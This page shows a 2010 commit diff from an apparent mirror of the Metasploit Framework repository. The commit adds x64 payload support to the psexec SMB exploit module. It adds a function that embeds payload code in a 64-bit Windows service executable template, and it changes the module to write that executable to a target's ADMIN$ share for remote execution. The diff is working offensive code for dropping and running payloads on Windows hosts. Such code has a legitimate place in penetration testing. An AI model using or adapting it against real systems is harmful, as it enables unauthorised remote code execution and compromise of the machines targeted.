infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

allow x64 payloads to be used with psexec 

git-svn-id: file:///home/svn/framework3/trunk@9565 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-21 03:49:39 +00:00
parent 33086db682
commit 2c91164494
2 changed files with 26 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
lib/msf/util/exe.rb
View File

@ -351,6 +351,26 @@ require 'metasm'
return pe
end
def self.to_win64pe_service(framework, code, name='SERVICENAME')
pe = ''
fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "service_x64.exe"), "rb")
pe = fd.read(fd.stat.size)
fd.close
bo = pe.index('PAYLOAD:')
raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
pe[bo, 8192] = [code].pack("a8192")
bo = pe.index('SERVICENAME')
raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
pe[bo, 11] = [name].pack('a11')
pe[136, 4] = [rand(0x100000000)].pack('V')
return pe
end
def self.to_win32pe_dll(framework, code)
pe = ''

6
modules/exploits/windows/smb/psexec.rb
View File

@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'hdm'
'hdm',
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
@ -127,7 +127,11 @@ class Metasploit3 < Msf::Exploit::Remote
filename = rand_text_alpha(8) + ".exe"
simple.connect("ADMIN$")
fd = simple.open("\\#{filename}", 'rwct')
if (datastore['PAYLOAD'].include? 'x64')
fd << Msf::Util::EXE.to_win64pe_service(framework,payload.encoded,rand_text_alpha(8))
else
fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8))
end
fd.close
print_status("Created \\#{filename}...")